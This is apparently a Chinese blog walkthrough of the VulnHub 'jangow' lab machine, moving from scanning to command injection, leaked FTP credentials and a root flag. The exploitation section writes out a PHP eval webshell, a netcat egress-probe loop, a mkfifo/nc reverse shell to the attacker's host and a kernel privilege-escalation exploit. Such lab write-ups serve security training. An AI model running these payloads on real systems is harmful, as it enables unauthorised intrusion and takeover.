首页 > 其他分享 >靶机jangow学习总结

靶机jangow学习总结

时间:2023-08-27 21:31:47浏览次数:61  
标签:总结 ftp 文件 iptables 一下 端口 jangow 192.168 靶机

一、安装

靶机下载:

https://www.vulnhub.com/entry/jangow-101,754/

下载后直接VMware打开启动,不过可能会出现没有获取到IP地址,导致后面扫半天也扫不出来信息的情况,可以百度一下,有很多解决办法。

二、信息收集

1.     ARP探测,看一下靶机获取的IP地址:

# arp-scan -l

靶机jangow学习总结_jangow

2.     使用nmap探测一下端口及服务情况,将结果保存到jangow文件中:

└─# nmap -sC -sV -oA nmap/jangow 192.168.2.21

靶机jangow学习总结_蚁剑_02

探测结果可以看到开放了21及80端口。

3.     80端口为网站,先对网站进行目录探测:

#dirb http://192.168.2.21 /home/kali/Desktop/tool/fuzz/fuzzDicts-master/directoryDicts/fileName10000.txt

靶机jangow学习总结_jangow_03

看到有一个.backup的隐藏文件。

4.     通过http访问一下网站,可以看到site站点:

靶机jangow学习总结_jangow_04

网站右上角有几个选项,挨个点击一下,前面两个都是定位到网页上的显示位置

靶机jangow学习总结_蚁剑_05

但是第三个选项buscar,可以看到URL可以输入参数,尝试一下命令,结果发现命令可以执行

靶机jangow学习总结_蚁剑_06

通过命令执行查看一下端口信息:

靶机jangow学习总结_jangow_07

看到监听了3306、22、80、21,但是端口扫描的时候只扫到了80、21,说明可能对3306、22进行了过滤。

5.     访问一下前面探测到的隐藏文件:

靶机jangow学习总结_jangow_08

发现文件中有用户名及密码信息。

6.     使用该用户名密码尝试一下ftp登录:

靶机jangow学习总结_jangow_09

ftp可以登录,并且登录后可以切换目录,可以大概看一下内容,和网站上显示的内容一样,当切换到该用户的家目录时,发现有user.txt文件,将其get下载下来:

靶机jangow学习总结_蚁剑_10

查看一下内容,显示结果为32位的MD5值。

# cat user.txt                                         

d41d8cd98f00b204e9800998ecf8427e

靶机jangow学习总结_蚁剑_11

再在ftp连接中试着上传一下文件:

靶机jangow学习总结_蚁剑_12

ftp不允许上传文件。

7.     现在尝试将ftp的内容全部下载到本地:

# wget -r --ftp-user=jangow01 --ftp-password=abygurl69 ftp://192.168.2.21/html/

靶机jangow学习总结_蚁剑_13

看一下下载的都有哪些内容:

# tree 192.168.2.21

靶机jangow学习总结_蚁剑_14

这里可以看一下busque.php的文件内容。

靶机jangow学习总结_jangow_15

看一下上图中的config.php中的内容:

# cat 192.168.2.21/html/site/wordpress/config.php

靶机jangow学习总结_蚁剑_16

这里又看到第二个用户名密码,可以访问一下,MYSQL连接失败。

靶机jangow学习总结_jangow_17

再尝试一下登录ftp,登录不成功。

8.     目前已经获得的信息:

(1)     监听了3306、21、80、22端口,但是只端口探测只扫到80、21,可能有防火墙

(2)     用户名:jangow01 密码:abygurl69,可登录ftp,ftp的版本信息为vsftpd3.0.3,在jangow01的家目录中找到了一个flag,但是ftp的权限不允许上传文件

(3)     用户名:desafio02  密码:abygurl69,ftp、mysql均连接不成功

(4)     网站存在一个命令执行漏洞:http://192.168.2.21/site/busque.php?buscar=ls

三、信息利用

1.     使用命令执行漏洞写入一个小马:

192.168.2.21/site/busque.php?buscar=echo '<?php @eval($_POST["cmd"]) ?>' > a.php

靶机jangow学习总结_jangow_18

显示上传成功

靶机jangow学习总结_蚁剑_19

2.     使用蚁剑进行连接

靶机jangow学习总结_蚁剑_20

3.     在KALI上监听4444端口,然后在蚁剑上进行SHELL反弹,结果都是失败的。

靶机jangow学习总结_蚁剑_21

4.     结果前面收集的信息,估计是有端口被过滤了,这里要探测一下从靶机到外部哪些端口是开放的。原理:在KALI上配置一条iptables规则,将到1-65535端口的流量全部重定向到4444端口,在KALI上监听4444端口,然后再从靶机上发起到1-65535的访问,如果到某个端口的流量未被拦截,那么到该端口的流量将成功转发到4444端口。

KALI上iptables配置:

# iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 4444

# nc -lvnp 4444

在蚁剑的文件管理中新建文件,并写入如下的内容:

#!/bin/bash

for i in {1..65535};

do

timeout 1 nc -vz 192.168.2.20 $i && echo "$i open" >> result.txt || echo "$i closed" >> result.txt;

done

靶机jangow学习总结_jangow_22

在蚁剑的虚拟终端中执行脚本:./b.sh

靶机jangow学习总结_jangow_23

然后是等待,同时可以观察监听端口的状态,以及查看result.txt文件中保存的结果,显示443端口是开放的:

靶机jangow学习总结_jangow_24

注:这里如果不逐个端口探测的话,可以对常见的端口进行尝试。

端口探测完成后,注意删除刚才的iptables规则:

# iptables -t nat -nL –line

# iptables -t nat -D PREROUTING 1

靶机jangow学习总结_jangow_25

5.     再次在443端口进行监听,然后在蚁剑虚拟终端上反弹SHELL:

(www-data:/var/www/html/site) $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.20 443 >/tmp/f

靶机jangow学习总结_蚁剑_26

获取bash:

$ python3 -c 'import pty;pty.spawn("/bin/bash");'  

靶机jangow学习总结_jangow_27

6.     提权

查看版本信息:

靶机jangow学习总结_jangow_28

查看该内核版本存在的漏洞信息,这里有一个:

靶机jangow学习总结_jangow_29

在KALI上查找可以利用的信息,并且拷贝到当前目录中

靶机jangow学习总结_jangow_30

Less看一下该文件的内容,这里有适用于版本号,同时这是一个c文件,使用gcc可以进行编译:

靶机jangow学习总结_jangow_31

将文件通过蚁剑上传到靶机中:

靶机jangow学习总结_蚁剑_32

文件已经上传成功,现在使用gcc进行编译,编译后的名字为upfile,然后直接执行该文件,可以看到提权成功。

www-data@jangow01:/var/www/html/site$ gcc 45010.c -o upfile

靶机jangow学习总结_jangow_33

获取bash,然后查看一下防火墙规则:

# python3 -c 'import pty;pty.spawn("/bin/bash");'

python3 -c 'import pty;pty.spawn("/bin/bash");'

root@jangow01:/var/www/html/site# iptables -L

靶机jangow学习总结_蚁剑_34

提权后可以看到有多个iptables规则。

进入到/root目录,看到有一个proof.txt文件,得到flag:da39a3ee5e6b4b0d3255bfef95601890afd80709

四、遇到的一个问题:

       在实验中遇到蚁剑连接上后,创建不了文件,向靶机写入不了文件,提示权限等奇怪的问题,多次尝试仍没有解决问题,研究了很多视频、博客后,决定重新下载靶机并进行部署,重新部署后就很顺利完成了,不知道有没有人遇到过。

标签:总结,ftp,文件,iptables,一下,端口,jangow,192.168,靶机
From: https://blog.51cto.com/u_9652359/7254822

相关文章

  • Java周总结8
    教材学习内容总结InputStream与OutputStream10.1.1串流设计的概念Java将输入/输出抽象化为串流,数据有来源及目的地,衔接两者的是串流对象。从应用程序角度来看,如果要将数据从来源取出,可以使用输入串流,如果要将数据写入目的地,可以使用输出串流。在Java中,输入串流代表对象为java.io......
  • 高并发实战总结02
    一、秒杀系统......
  • 本周总结
    本周回顾将环境进行了进一步的完善,然后准备了一些开学需要用到的东西,提前为开学做个准备先;遇到的问题hadoop无法正常启动,hdfs集群的jps不显示;hadoop的具体实践;解决方法根据一些教程彻底解决啦!我现在可以堪称为问题王者(自认为);实践方面,还得继续努力;下周预计下周就要开学啦......
  • Windows 11 绕过 TPM 方法总结,通用免 TPM 镜像下载 (2023 年 8 月更新)
    Windows11绕过TPM方法总结,通用免TPM镜像下载(2023年8月更新)在虚拟机、Mac电脑和TPM不符合要求的旧电脑上安装Windows11的通用方法总结请访问原文链接:https://sysin.org/blog/windows-11-no-tpm/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org本文......
  • 《LGJOJ 8.22》 测试总结
    \(T1\)青蛙送分题,不说了。也是唯一会做的题。点击查看代码#include<bits/stdc++.h>typedeflonglongLL;usingnamespacestd;constintMAXN=210;intn,m,k,x,y,z;intf[MAXN][MAXN][MAXN];intdx[10+10]={0,0,1,-1,0};intdy[10+10]={1,-1,0,0,0};intdz[10+......
  • 步步高 BPK 加密方式总结
    前言最近花了几天时间彻底研究透了步步高的BPK加密格式,写一篇博客记录一下研究的成果本文只记录一些研究的步骤和研究成果,不是破解教程之前的记录步步高加密APK格式BPK研究:续步步高家教机加密安装包BPK研究(已弃坑)什么是BPK步步高为其旗下搭载StudyOS定......
  • 【Flask框架知识点总结】
    【一】Flask框架之初识Flask框架引入Flask框架简单使用简单的Flask框架登陆案例wsgirefwerkzeug【二】Flask框架之配置文件Flask框架的配置文件配置方式【三】Flask框架之路由系统路由系统介绍转换器【四】Flask框架之CBVCBV使用CBV源码简析【五】Flask框......
  • 第七周总结
    本周我着重复习了Linux的相关内容,并对以下几个方面进行了总结和学习: 1.基本概念和命令行操作:我回顾了Linux操作系统的基本概念,包括文件系统、进程管理、权限管理等。我还复习了常用的命令行操作,如目录切换、文件查看和编辑、文件权限设置等。这些知识对于在Linux环境下进行日常......
  • 大数据总结
    这周四开始试写javaweb,其中数据库换成了hive,我用的springbootl来集成的,简单的增查可以实现,接下来去写完整逻辑的web网站。hive整个服务启动流程首先是start-all.sh然后打开历史服务器:mapred--daemonstarthistoryserver最后首先启动metastore服务,然后启动hiveserver2......
  • Nacos漏洞总结
    Nacos简介Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。复现环境搭建本次复......